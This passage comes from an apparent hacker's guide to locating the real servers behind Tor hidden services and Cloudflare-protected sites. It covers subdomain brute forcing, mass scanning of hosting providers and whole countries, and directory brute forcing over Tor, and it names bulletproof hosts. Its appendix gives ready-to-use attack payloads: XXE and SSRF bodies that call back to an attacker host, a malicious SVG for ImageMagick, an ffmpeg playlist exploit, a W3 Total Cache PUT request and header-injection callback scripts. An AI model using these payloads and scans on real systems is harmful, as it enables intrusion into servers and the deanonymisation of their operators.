Brute force domains using bash - "domain="site-here.com" ; wordlist="./path/to-wordlist.txt" ; for i in `cat $wordlist` ; do dig +noall +answer +retry=5 "$i.$domain" ANY | grep -ve NX -e FAIL ; done | tee $domain-subdomains.txt"
- Use a specific dns server with dig (like an authoritative one) - dig +noall +answer "$i.$domain" @ns01.site-here.com ANY
- Substitute host for dig (it'll use the nameservers in /etc/resolv.conf): host -t ANY "$i.$domain"
- A lot of times if a public dns server like 4.2.2.1 is rate limiting you, the authoritative server for the domain will be more lenient. Just find them with "host -t NS site-here.com"
- For some reason doing it this way is way more reliable than amass/altdns/subbrute/etc.
whois - there are a few versions of essentially the same program. If you're not familiar with whois please go hit yourself with something. You'll probably have to install it; some versions are called mwhois and jwhois.
--== Searching for sites based on hunches as to where they might be located
If you've gotten to this point your chances of figuring out where the site is located are actually pretty low. We've gone from really solid ways of getting ip info, to slightly sketchier ways, to databases that usually don't work, to this: brute force scanning. If you can come up with some suspect hosting companies it doesn't take too long to scan all of them for the site you're looking for. You generally won't find it but it's kind of fun and not hard to do. After this section there's a variation for tor sites - while you generally have no clue where they are actually located, there's a limited number of hosting companies that are friendly towards DNMs and vendor sites. If you get a good list you can just scan all of them.
If you're wondering why I'm obsessed with SSL, it's because it's accurate - a site with "www.foobar.com" in its SSL certificate is pretty unambiguous. You'd think you could do the same thing with non-SSL http sites, and for what it's worth you really can't.
- It's kind of like using a pirate map
Sometimes you'll run into a situation where you have a strong guess about where a website is hosted. Maybe their Cpanel is branded, maybe their MX record points somewhere interesting, or maybe it's "general knowledge" that they're hosted somewhere or in a specific country.
To scan an entire webhost or small ISP, do a whois on their IP address and grep for the AS (it'll be there somewhere). Go to https://bgp.he.net and search for ASXXXX where XXXX is the number you saw in the whois records. That'll give you an official company name. Search https://bgp.he.net again for that company name and you'll wind up with a list of Autonomous Systems. Each AS is responsible for keeping track of a number of blocks of ip addresses. (I'm avoiding explaining what an AS is. It's the BGP thing, go look it up if you want to know how the internet works). I don't have a tool to do it, but if you visit each AS and then go to IPv4 Prefixes you can make a text file that's basically a giant list of ip address/cidr netblock that'll look like:
Fake example:
185.4.211.0/24
200.128.0.0/16
200.129.0.0/16
200.139.21.0/24
200.17.64.0/16
Total ips: 145796
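If clicking through bgp.he.net gets old, you can usually pull the same prefix list out of the public routing registries with whois. A sketch - the AS number here is made up, and not every network keeps its route objects up to date:
whois -h whois.radb.net -- '-i origin AS12345' | grep -E '^route:' | awk '{print $2}' | sort -u > netblocks.in.txt
wc -l netblocks.in.txt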
Either way, store it all into a file - we'll call it netblocks.in.txt. An example command to scan them all with nmap is:
nmap -sS -sV -sC -T5 -p1-65535 -iL netblocks.in.txt
The important part is -iL netblocks.in.txt. It'll take some time, but it's quite possible to run nmap completely automatically and let it chew through every potential ip address, using the SSL subject and servername checks from earlier to look for an exact match on the site you're after. Make sure you save your data. There's another port scanner called masscan that you might want to try. It's almost exactly the same speed as nmap if you need to scan every port on a host, but if you only want to scan ports 80, 22, or 443 then it's so much faster your head will spin.
Compare:
time nmap -sS -p80 -PS80 200.129.0.0/16
time masscan -p80 200.129.0.0/16 --rate 5000
The other cool thing about masscan is it has its own tcp/ip engine and can run through VPNs that don't have routing set up. I'm not going into it, but it's really useful if you're using a VPN provider from a hosted virtual machine.
You can take this sort of search even further. It's quite possible to scan entire countries. Many of them are considerably smaller than large cloud providers like AWS. If you look around you can find lists of netblocks per country in cidr format. Masscan supports -iL like nmap does, so you can use the list of netblocks as your input for the scanner. In ALL THESE CASES make sure you save your output to a file!!!!!!
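A sketch of the whole flow with masscan feeding nmap - country-netblocks.txt is whatever cidr list you dug up, the rate is something to tune down if you start dropping packets, and the servername is your target:
masscan -p443 -iL country-netblocks.txt --rate 10000 -oL masscan-output.txt
grep '^open' masscan-output.txt | awk '{print $4}' | sort -u > https-hosts.txt
nmap -n -Pn -sT -p443 --script=ssl-cert --script-args="tls.servername=www.target-site-here.com" -iL https-hosts.txt -oA target-hunt
The -oL and -oA flags are the "save your output" part.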
- Bulletproof webhosts
If you've scanned a tor site and it has SSH open, you can use nmap (both over tor and while scanning a hosting company) to try to find a matching key fingerprint. Tor sites almost never have SSH open, but I need something uniquely identifiable for this demonstration. Without some way of verifying an onion site other than looking at it, getting to this part of the document is not a sign of success. Regardless, there's a fairly short and sweet list of hosting companies that are shady enough to host darknet markets. Cloudflare protected sites, on the other hand, can be hosted almost anywhere normal.
Shady hosting companies like this are known as "bulletproof hosting companies" and are way more popular for tor hidden sites than average. Some specialize in spam, others in malware, piracy, etc. Also, for some reason you can find quite a few vendor shops (including really big ones) hosted by GoDaddy. In one case I found a huge well known vendor site that was - as far as I could tell - being run off GoDaddy. What was possibly their real ip address was exposed by a PDF invoice download form that pulled its data from a server hosted there. That doesn't prove they're hosted there, but there's a really good chance they are.
If you are thinking of setting up a hidden site I really wouldn't use a normal hosting company like GoDaddy, The Planet or HostGator. People who use big hosting sites should expect close to no privacy. I have noticed that tons of hidden websites use CDNs (content delivery networks). Figuring out what CDN a hidden site uses generally isn't that useful, but it's nice to know.
- Hosting companies known for hosting drug related content
Here's a few popular shady-ass hosting companies that tend to host more than their share of DNMs and vendor sites. For some reason GoDaddy is popular for vendor sites as well - it's huge, you have no privacy, and I have no idea why you'd put your site there. Cloud providers like AWS are way too big to scan. Lastly, a few of these hosting providers try to use or lease out ip address space that doesn't have their name on it (specifically so you can't scan them for sites). That's not that common until you're talking about places like OrangeWebsite or CyberBunker (busted). Here's a somewhat outdated (2018?) list of popular hosts from when the crimeflare hack still worked:
www.orangewebsite.com (biggest one)
Icenetworks Ltd. (I think this is actually orange website) - https://bgp.he.net/search?search%5Bsearch%5D=Icenetworks+Ltd.&commit=Search
www.hawkhost.com
godaddy.com
knownsrv.com
ititch.com
singlehop.com
There's always one or two tiny onion hosting companies that are popular for hosting only onion sites, and they're usually quick to check out. They also tend to die a lot by being hacked - Daniel's Hosting, Freedom Hosting, and Freedom Hosting II have all been hacked out of existence. If they have replacements you should check them for your target site.
- Brute forcing vhosts (and why it's a dead end)
Nmap has a script that'll let you search web servers for domains from a list. If you have a target site and a list of associated sites or subdomains, you can check a number of web servers to find the target by vhost. There are two problems. The first is that tor site operators might not be using a standard port number (like 80 or 443). The second and less expected problem is that around 1 in 10 websites will respond to a standard http request for _any_ vhost and either send you the same site, or redirect you with a 301/302 or something else that'll screw up your search. If you scan http (non SSL) sites for vhosts, expect to see large numbers of false positives.
Here's how to run the script anyway. subdomains-found.txt is the stuff you've discovered, the main site is just an argument to the script that I've called target-site.com, and netblocks.txt is the netblocks you've selected to search:
nmap -sS -p80 -T5 --open --script=http-vhosts --script-args="http-vhosts.domain=target-site.com,http-vhosts.filelist=subdomains-found.txt" -iL netblocks.txt
It's one of the few ways you can *try* to locate an onion site without an SSL or SSH fingerprint which you'll generally never have. Unfortunately the high rate of false positives makes it pretty useless.
--== Mapping the site structure
I've mentioned mapping the site before. It doesn't have a good rate of success on its own, however if you explore and map out the site it'll give you a lot of additional information that you'll probably find useful anyway - forms, things that send email, scripts that were installed and forgotten about, addresses and phone numbers, places to upload things or store data, information about image hosting and CDNs, subcontractor names, company names, email addresses, the occasional raw ip address or hostname, and subdomains that you never would have guessed. This isn't going to be a guide on how to use dirb, wfuzz, etc.
Obvious defensive note: If you're running ANY sort of a darknet site you really need to have your own small network, virtualized, real, whatever. Your web servers can not know their real ip addresses and should at the very least be behind some sort of NAT, SNAT, or other port forwarding/address translation.
If you haven't found the site yet, doing this sort of mapping through cloudflare is extremely annoying. Doing it to a tor site is more straightforward, but proxychains tends to be unstable, so neither is fun at all.
The quality of your wordlists is really important. If you're scanning through cloudflare or precariously tunneling your requests through tor's socks proxy, you don't want to waste a lot of requests. You can do things like brute force directories off / (non-recursively) and then use a wordlist of php files to find php files in the directories that turn up. You can always scan the directories you've found again later. Most darknet sites are written in PHP, and while anything can be hidden behind cloudflare, it's usually a CMS of some sort.
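As an example, a directory brute force pushed through tor with dirb might look like this (a sketch - the wordlist path is the one from the Kali package, -z adds a delay in milliseconds so the circuit doesn't fall over, -r turns off recursion):
proxychains4 -q dirb http://xxxxxxxxxxxxxxxx.onion/ /usr/share/dirb/wordlists/common.txt -r -z 500 -o dirb-results.txt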
Tools for mapping site structures:
robots.txt and sitemap.xml
Burp Proxy (in proxy mode or Discover Content under the engagement tools menu)
OWASP Zap (I assume, it really should be able to)
dirb - my personal favorite
wfuzz - the syntax is weird but it's more flexible than dirb. It also requires way more memory to run. The first parameter you're fuzzing is called FUZZ, the second one (in the order you defined them on the cli) is FUZ2Z, etc.
Google/yandex/others search queries like - site:site-here.com, inurl:, intitle:, filetype:, etc.
- Javascript files
Javascript files that aren't generic libraries tend to have a lot of urls in them. You can then see what those urls have to do with the main site. Most of them won't be relevant, but it's a really interesting place to look. As an added plus you get details about how to construct valid urls. You can also pull similar lists of URLs out of cellphone apps, but I haven't seen a hidden site with an Android app yet.
Tools:
JSScanner - https://github.com/dark-warlord14/JSScanner.git - https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
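If you don't feel like installing anything, a lazy grep will get you most of the way there. A sketch (main.js is a placeholder for whatever javascript file you pulled out of the site):
curl -s https://target-site-here/js/main.js | grep -oE 'https?://[A-Za-z0-9._/-]+' | sort -u
curl -s https://target-site-here/js/main.js | grep -oE '"/[A-Za-z0-9._/-]+"' | sort -u
The first line pulls out full urls, the second pulls out quoted absolute paths you can feed back into your directory brute forcing.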
- APIs
If you find some sort of API (maybe referenced in javascript, maybe you just found a path like /v1/ or /api) you can brute force the url with a wordlist specifically made for APIs. If you're lucky it'll be obvious how to get it to work, since the average API is a ball of interesting information that, if you poke it correctly, will spew out all sorts of details about something.
A lot of sites have APIs somewhere. Even darknet sites usually document their API and will provide it to interested parties. Lastly, APIs almost always provide a lot more information than a normal web page.
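A wfuzz sketch for brute forcing API paths - api-wordlist.txt is a placeholder for whatever API wordlist you grabbed (SecLists and the assetnote lists mentioned earlier both have them), and --hc 404 hides the responses that are plain 404s:
wfuzz -c -w api-wordlist.txt --hc 404 https://target-site-here/api/FUZZ
proxychains4 wfuzz -c -w api-wordlist.txt --hc 404 http://xxxxxxxxxxxxxxxx.onion/api/FUZZ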
- Status Pages and Similar Mistakes
Most web servers have a built in status page that's normally only accessible from localhost. The Apache status page is incredibly informative and lists every ip address that's connected to the daemon. Nginx has one too, but it's only a count of the number of connections. Someone has to have screwed up pretty badly for a hidden site to expose one of these urls, but it is possible to do accidentally. One way a status page could be accidentally exposed is if something like Varnish Cache is running on the same machine - it's a piece of software that configurably caches web pages, so if it's running on the same server then all your connections are being proxied through localhost (unless they're cached).
There's a somewhat similar problem on websites hosted by servers running cPanel. While cPanel improves server security in many ways, it installs some paths and a cgi directory that are accessible on every site managed by the software.
URLs:
http://yoursite.com/server-status - Apache status page, visible from localhost (or a non blind SSRF)
http://yoursite.com/status - Nginx status page, but it doesn't have that much information
http://yoursite.com/cpanel - This url will redirect you to the ip address of the server on port 2082
http://yoursite.com/whm - This is another part of cPanel, and redirects you to port 2086
Example:
----- Let's go to sitename.com/cpanel and see what happens -----
$ curl -k -v https://sitename.com/cpanel
* Trying 5.253.28.68:443...
* Connected to sitename.com (5.253.28.68) port 443 (#0)
> GET /cpanel HTTP/1.1
> Host: sitename.com
> User-Agent: curl/7.74.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Date: Sat, 27 Feb 2021 04:33:04 GMT
< Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips
< Location: http://5.253.28.68:2082/ <----- tada!
< Content-Length: 232
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://5.253.28.68:2082/">here</a>.</p>
</body></html>
* Connection #0 to host sitename.com left intact
-----
This also shows how cPanel keeps all the software extremely up to date. As of right now most people are still using OpenSSL/1.0.1, and I didn't know 1.0.2x had even been released.
- Other loot
The whole point of mapping a website like that is you'll inevitably find something useful or interesting. See what you'll find! Some example unexpected finds could be:
- old contact info
- test scripts of various sorts
- hidden registration or email pages
- admin/manager interfaces
- directories like "database" "upload" or "backup"
- images with location (exif) info
- Scripts that might expose data. Have you seen Django's 404 page with full debugging enabled?
- Text files like readme.txt and changelog.txt
--== Appendix: Misc exploits, misconfigurations and tools
- Wordpress upload directory and CDNs
Every Wordpress site has a directory called https://sitename.com/wp-content/uploads/. It's not that unusual to be able to see all the files in that directory, and a number of them tend to be sensitive. Sometimes you'll even find backup files and other really random stuff with information about the website.
There's something else useful about a Wordpress upload directory - pictures! They're kept in an easily guessable format: https://blogurl/wp-content/uploads/YYYY/MM/ so it's really easy to find the folders with wfuzz. From there you can see if any of them have exif data! Non-stock photos of offices, staff, office parties, etc could potentially give you the exact coordinates of their office. If you're running a diet pill site you probably really don't want people knowing where you work. (I'd guess it's to make them hard to sue - the last diet pill site I tried to locate had obviously hired pen-testers to make sure they weren't leaking their location. The best I could find at the time was a contact form from a long time ago that had a PO box on it and some stuff like that.)
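A sketch for grabbing a month's worth of images and checking them for gps coordinates - this assumes the uploads folder lets you list its contents, 2021/03 is a placeholder, and exiftool is in most distro repos:
wget -r -l1 -nd -A jpg,jpeg,png https://target-site-here/wp-content/uploads/2021/03/
exiftool -a -gps:all *.jpg *.jpeg *.png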
A CDN (content delivery network) is basically a fancy hosted version of an upload directory. In my opinion there's not much point in figuring out where a CDN is located or what it's actually called (since it's always hosted by someone else), but if you can browse through it, it's pretty similar to a Wordpress upload directory. A lot of large Wordpress sites use a CDN for their upload directory, then use a reverse proxy (one with a hard coded destination) to integrate it with the site. You can tell because the error messages for missing files or directories you can't list will suddenly look very different. Google the message and, for what little it's worth, you'll know where they host their files. There are other ways of identifying (and finding) CDNs, but as far as locating sites goes they aren't any more useful than the files they host.
- changelog.txt
A lot of sites install software that leaves a file named changelog.txt sitting around. A changelog is a file with a quick note explaining the changes that have been made since the last version. Even if it doesn't state the version of the software there will be something like a commit id - a big hexadecimal string like "b2036b102bc87d799b9d17e1e". Wordpress leaves a readme.html file sitting around as well, and wpscan has a few hacks for getting its exact version.
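A quick way to check by hand (sitename.com is a placeholder, and the paths are just the usual defaults):
----- version-leak-check.sh -----
#!/bin/bash
# Pull the usual version-leaking files and grep for version strings or anything
# that looks like a commit hash.
curl -sk https://sitename.com/changelog.txt | grep -iE 'version|[0-9a-f]{12,40}' | head
curl -sk https://sitename.com/readme.html   | grep -iE 'version' | head
-----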
- Google Image Search
Google image search can search for pictures based on what they look like, using some kind of slightly dumb AI. You can't do this from your cellphone. Go to images.google.com on a computer, click the black camera icon and upload the picture you'd like to find online. Try searching for a company logo or something like that. You can also add keywords to help Google's AI out.
- Burp Collaborator Everywhere plugin
Someone at Portswigger wrote a plugin called "Collaborator Everywhere" that's specifically for unmasking hidden sites. I only found it yesterday. Burp Collaborator is kind of like http://pingb.in except it's hosted on your machine. If you don't have the paid version of burp that lets you load extensions, _do_not_ spend the money just for this - most burp extensions are not particularly useful, and in this case the plugin wouldn't load again after the initial installation. On top of that, Burp Collaborator kept mis-detecting my ip address somehow. I might write my own script that does the same thing given an http(s) request in a text file - it'd probably be more effective to try one parameter or header at a time rather than quite literally all of them at once (there's a rough sketch of that idea after the links below).
The paper can be found here: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface (TL;DR, it sticks urls in nearly every parameter and adds a bunch of HTTP headers that also have urls in them. It's still worth reading.)
Related urls:
https://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/
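Here's a minimal sketch of that one-at-a-time idea - not Portswigger's plugin, just bash and curl. It assumes you control a callback host and can watch its access or DNS logs; the header list is a guess at the usual suspects:
----- header-callbacks.sh -----
#!/bin/bash
# Inject a callback URL into one suspicious header per request, pausing between
# requests so a hit in your logs can be matched back to the header that caused it.
# Note some of these headers normally hold an ip or hostname rather than a URL.
CALLBACK="http://youripaddresshere/"
TARGET="https://sitename.com/"
for h in X-Forwarded-For X-Forwarded-Host X-Real-IP True-Client-IP Forwarded Referer; do
  echo "[*] trying $h"
  curl -sk -o /dev/null "$TARGET" -H "$h: $CALLBACK"
  sleep 5
done
-----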
- XML input forms
XML's specification allows for a type of exploit called an XXE (External Entity attack). This type of attack can be used to do SSRF and LFI by specifying URLs or files in the header of XML input. My experience with XXEs is limited since XML based forms are far more common in the Microsoft world - the Linux ecosystem leans more on formats like JSON and Protobuf (though XML forms are used there as well). There are entire API protocols based on XML input, like SOAP.
To keep this section from being really confusing: an XXE is a type of vulnerability that abuses XML features to read files or connect to websites (aka an SSRF). An SSRF is anything on a site that you can get to connect to a URI you specify. If you're trying to steal cloud credentials you also need to get the response back somehow; for just locating a server, the connection itself is enough.
This XML functionality exists so the format can be extended into other document types, and fortunately people have gone nuts with it - there are millions of XML derived file formats, network protocols, etc. Almost all XXE attacks abuse DOCTYPE - it's like a header to an XML file that allows it to define new entities and data types (and possibly other things I'm not aware of). You abuse this header by telling it that its document specification file lives on a remote website, or in /etc/passwd, or something like that.
There's a variation on this attack that is a denial of service attack called the "Billion Laughs Attack" that's worth looking up if you're into crashing things. Because of the numerous security issues with using the XML specification exactly as written a lot of XML libraries ignore some of this stuff, and what is or isn't ignored depends on the software, programming language, and occasionally if it actually needs the abusable features.
The most effective way of using an XXE check like XXE-POST-body.txt is to add the XXE header at the beginning of an XML form, right after the xml version line, and keep the rest of the data that was going to be submitted. A few things (like MS Sharepoint servers) will let you convert one type of form (multipart mime, json, etc) to an XML form if you just change the Content-Type HTTP header in your request to "application/xml". Lastly, a lot of vulnerability scanners simply submit the XXE check to the form without actually filling in the parameters the form expects, so that must work at least some of the time. It makes sense - anything parsing XML that doesn't ignore the headers would probably have read them before it could read the data.
The first line (xml version and optional encoding) is only needed if you're sending the XXE test without any other form data. Otherwise just stick the last 3 lines after the xml declaration of a request and before whatever else was going to be sent. Don't forget to adjust your Content-Length! The bash command "wc -c filename" will tell you how many bytes are in a file, then add two for the newlines at the end of your HTTP request (four if you use \r\n). There's a sketch of the raw-request version right after the body file below.
----- XXE-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://youripaddresshere/">]>
<foo>&xxe;</foo>
-----
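If you do want to hand-craft the raw request (the curl example below is easier), the length bookkeeping looks roughly like this - target-site-here and /api/v2/submit are placeholders:
----- raw-xxe-post.sh -----
#!/bin/bash
# Build the raw POST by hand so Content-Length matches exactly what gets sent
# (character count equals byte count for an ASCII body), then push it over TLS.
body=$(cat XXE-POST-body.txt)
printf 'POST /api/v2/submit HTTP/1.1\r\nHost: target-site-here\r\nContent-Type: application/xml\r\nContent-Length: %d\r\nConnection: close\r\n\r\n%s' \
  "${#body}" "$body" | openssl s_client -quiet -connect target-site-here:443
-----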
Just like with the Wordpress exploit, you can save yourself having to manually construct an http(s) request by using curl - that way curl handles most of the details like the size of the data. Like the other variations on an SSRF attack, you need a listener that's reachable.
Simple example without the parameters for a form:
curl -k -i -X POST http://target-site-here/api/v2/submit -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@XXE-POST-body.txt"
I have a few more examples, and the documents I've linked to have many many more, as well as some really crafty tricks for getting the data back to you or evading defenses - for example you can evade whitelists with urls like www.allowedtoconnect.com@yoursite.com . Non-blind SSRFs can be used against the "metadata servers" that cloud services run, which sometimes hand out credentials, but that's outside the scope of this document - for our purposes blind SSRFs are just fine for locating servers.
----- ALT-SSRF-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foobar SYSTEM "http://youripaddresshere/mal.dtd">
-----
A different way of doing the above:
----- ALT2-SSRF-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root_element PUBLIC "-//foobar//a" "http://youripaddresshere/mal.dtd">
-----
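For the blind SSRF use case here, the contents of mal.dtd barely matter - the parser fetching it is the callback you're after - but if you want the file to parse cleanly, something minimal like this works (the entity name is arbitrary):
----- mal.dtd -----
<!ENTITY % placeholder "nothing to see here">
-----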
Some of the urls in an XML document are not useful - afaik the links to w3 specifications don't actually cause a connection to w3; they're more there for your edification. I think.
Papers:
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/ - filled with weird things you can do to XML libraries/parsers/etc. Some of the things they demonstrate are completely depraved. If you can get data back from the XXE/SSRF you should try querying localhost's status page. I mentioned the urls for Nginx and Apache above.
https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf - This paper also has tons of good information on XXE attacks. Its set of tricks is very different from the first paper, and it also mentions other protocols and file formats which can be used to trigger XXE attacks.
- SSRF exploits that work via file conversion utilities
Nearly any website that lets you upload an image will both resize it (sometimes to make a thumbnail) and remove the exif data, so while researching details for this paper I've come across a lot of miscellaneous file based exploits. Video upload sites almost always need a thumbnail picture from the beginning of the video, and PDF converters are also notorious for having issues, including SSRFs. Occasionally you'll even see websites converting things like word documents. It's not very common, but you can actually run OpenOffice in headless mode and use it to convert document formats on a website; it's kind of buggy and crashes a lot, so I don't think you'll see people doing that too frequently.
The purpose of this section is basically to list a number of potentially useful file formats with known vulnerabilities.
::SVG image format + ImageMagick (CVE-2016-1897 & CVE-2016-1898, not fixed)
An SVG file is an image, but it's a vector image rather than a normal bitmap - it's built out of lines, circles, and other shapes instead of pixels. For some reason the format lets you load text, other svg files, or textures from hyperlinks using its "xlink:href" attribute. The Mozilla developer page warns that xlink:href is unlikely to be supported as a feature for much longer, but I've tested it on a very recent version of ImageMagick and it still works. It probably works on many other pieces of software as well - though if you can upload a .svg file you may as well try uploading a .php file or something like that.
This exploit code is from https://infosecwriteups.com/my-first-bug-blind-ssrf-through-profile-picture-upload-72f00fd27bc6
----- fakeimage.svg -----
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="30" width="30"
xlink:href="https://youripaddress/pic.svg" />
</svg>
-----
I found a useful document called the "SVG SSRF Cheatsheet" that goes into getting your SVG file uploaded to the site as a different picture type and things like that. There's an extremely common cli image manipulation suite called ImageMagick that many sites use to change file formats and automatically make sure pictures are the correct size and resolution; it and PHP's LibGD/LibGD2 libraries are the two most common things used to resize pictures on webservers.
ImageMagick is also the only common image conversion utility that uses the uploaded file's contents rather than its filename or mime type to figure out how to process it, which is really pretty awesome. The vast majority of website upload scripts check the filename's extension and mime-type; it's kind of unusual for an upload script to actually check the file's contents. This means that if you upload your SVG file as someimage.png then ImageMagick will still treat it like an SVG and get exploited. Incidentally the SVG file format turns out to have a really large number of places where you can put a URL, and the paper below has a list.
Paper: https://github.com/allanlw/svg-cheatsheet - List of places in the SVG specification where you can add a url
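If you want to sanity check that behavior locally before trying it on a target, here's a quick sketch (assumes ImageMagick's convert is installed and that youripaddress is a host whose access logs you can watch):
----- local-imagemagick-test.sh -----
#!/bin/bash
# Rename the SVG so it claims to be a PNG, then convert it. ImageMagick sniffs
# the file contents, parses it as SVG, and tries to fetch the xlink:href URL.
cp fakeimage.svg someimage.png
convert someimage.png out.jpg
-----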
::FFMpeg
This exploit is extremely old and doesn't work on recent versions of ffmpeg. You can make an mp4 file that's actually an m3u8 (HLS) playlist, which allows an SSRF through the playlist directives. Similarly, you can make an HLS playlist that pretends to be an AVI file, which is an even older exploit, so I didn't include it - the files that result from either exploit are nearly identical. The original exploits were actually used to steal files, but if you really have no other vectors maybe this will work. It requires the target's copy of ffmpeg to be something like five years old.
Exploit from the SSRF Bible: https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf
The Ubuntu discussion of the same bug: https://bugs.launchpad.net/ubuntu/+source/ffmpeg/+bug/1533367
You don't actually have to steal files if you don't want to:
----- ssrf.mp4 -----
#EXTM3U
#EXT-X-MEDIASEQUENCE:0
#EXTINF:10.0,
http://yoursite/
#EXT-X-ENDLIST
-----
This would be triggered by a vulnerable version of ffmpeg using the file as input, for example "ffmpeg -i ssrf.mp4 blah.avi", or by making a thumbnail out of the video.
Paper: https://hydrasky.com/network-security/exploiting-ssrf-in-video-converters/
::PDF Files
There's a lot of things that are slightly weird about PDF files. I'd like to start by mentioning that I overheard the CTO of a company I worked for discussing how you can pay Adobe for the ability to be notified when someone reads a PDF, for example a sensitive internal document. PDF files can have javascript embedded in them; that led to absolutely huge numbers of heap overflow exploits a few years ago. I gather Adobe Reader had various kinds of functions that could be invoked by javascript in the same document? These days malicious MS Office files are far more popular, since a lot of the Adobe Reader exploits have been patched and the exploitable MS Office features are present in most of their non-cloud office products.
A lot of people don't know that PDF files can contain javascript. On top of that there's more than a few PDF conversion utilities with known vulnerabilities. In fact, one was just found in ImageMagick quite recently (2021). I apologize for mentioning that piece of software repeatedly, but it's both common and written by people with an obvious lack of interest in making it even vaguely secure (or in some cases even patching known vulnerabilities).
List:
https://www.exploit-db.com/exploits/49558 - PDFComplete UNC (2021), SSRF + creds!
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html - RCE, exploit is at the very bottom. It's more of a multistage ImageMagick exploit that uses a pdf vulnerability, but you could also exploit a script that uses ImageMagick to turn encrypted PDFs into image formats with a user supplied password. I've never seen that situation, but if you do see it it might be exploitable
https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf - how to pwn some headless office software doing PDF conversion using a malicious iframe. It's towards the back. There's also a video of this on Youtube.
::Wordpress w3 total cache SSRF (just an SSRF, but it's brand new)
Since Wordpress is slow as fuck there are various page cache plugins that save rendered copies of the site so it'll load faster. W3 Total Cache is one of the less popular but still widely used ones.
----- yes it's a put request apparently -----
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: targetsite.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Connection: close

{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"http://yourserverhere/"}
-----
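If you'd rather let curl handle the framing, something roughly equivalent would be (targetsite.com and yourserverhere are placeholders):
curl -sk -X PUT "https://targetsite.com/wp-content/plugins/w3-total-cache/pub/sns.php" --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"http://yourserverhere/"}'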
::Things worth looking into
The number of file formats derived from XML is enormous, and all sorts of other file formats have things that are either weird or obviously wrong with them. A MS docx file is basically a zip file full of xml files (see below). This stuff doesn't have to be hard to test - find some random word processor and see if you can embed an image straight from a website, or see if you can embed UNC paths to SMB shares where a program would expect a filename.
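For example, to see the docx-is-a-zip thing for yourself (example.docx is any document you have lying around):
----- docx-peek.sh -----
#!/bin/bash
# List the XML files inside a docx, then dump the start of the main document part.
unzip -l example.docx
unzip -p example.docx word/document.xml | head -c 500; echo
-----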
- Indexes to two frequently mentioned papers
::XML based SSRFs in various files and protocols:
https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
List:
Data exfiltration via XXEs
Protocols supported by various XML libraries (note that gopher support was deprecated in 2012)
Some trick for having Java get files out of JARs, docx, and other zipped formats
Something about remote JARs - I'm not sure exactly what; the slide has a red shell and something about pwnage
::A paper about SSRFs that includes a large number of exploits for common software
https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf
List:
Finding SSRFs and protocols supported by web server software of different kinds
Response splitting
XML, OpenOffice, PDF
Abusing various libraries (a different list than the OWASP XXE paper)
PostgreSQL access
- Google dorking for stuff
It's always worth searching a website in google or yandex for stuff like microsoft documents and backup files:
(in google) site:somewebsite filetype:sql
Other file formats: mdb (microsoft database), doc, docx, xml, zip, bak, txt, pdf, ppt, myd/myi, tar.gz, tgz, swp, etc.
Useful search engine commands are site:, inurl:, intitle:, 00..99 (a range of numbers), and stuff like that. In addition, dorking is not a terrible way of looking for parameters that might have issues on a specific site. Google sometimes blocks this sort of thing, but there are lots of search engines and they all tend to use the same syntax. Here are a few searches that might turn up vulnerabilities:
site:somesite.com inurl:url= (most engines will ignore the = unfortunately)
site:somesite.com inurl:file=
site:somesite.com "Index of"
site:somesite.com intitle:Index
You can also try downloading jpg/jpeg files from the site and checking their exif data - the onionscan tool introduced me to this trick. If it works you get the actual location where the photo was taken. Use google dorks (or just look around) to find things like pictures of staff members, and if the site has a CDN you can browse through or an image upload folder (like Wordpress), look for anything that doesn't seem to have been processed much. This is more likely to work on small sites than major ones; forums and image sharing sites usually strip exif data automatically.
Use google statements like "filetype:blah site:yourtarget.com" or "inurl:mdb site:yourtarget.com" to find specific document or file types on a site. Keep in mind that websites use a lot of stock photography, so ideally you want a picture of the staff or the office, not clip art. Tools that will let you see exif data include exiftool, the Gimp, and millions of websites like https://exifinfo.org/. Some or all of the exif data is lost when an image gets resized, but it's easy to check a lot of images (there's a quick sketch below).
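A minimal sketch of the bulk version, assuming exiftool is installed; yourtarget.com is a placeholder and this only checks images linked from the front page, not the whole site:
----- exif-sweep.sh -----
#!/bin/bash
# Pull every jpg referenced on the front page and grep its exif data for GPS tags.
curl -sk https://yourtarget.com/ \
  | grep -oE 'https?://[^"'\'' ]+\.jpe?g' | sort -u | while read -r url; do
      curl -sk "$url" -o /tmp/img.jpg
      exiftool /tmp/img.jpg | grep -iE 'gps' && echo "  ^-- $url"
done
-----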
- Misc networking attacks
Malicious HTTP Headers
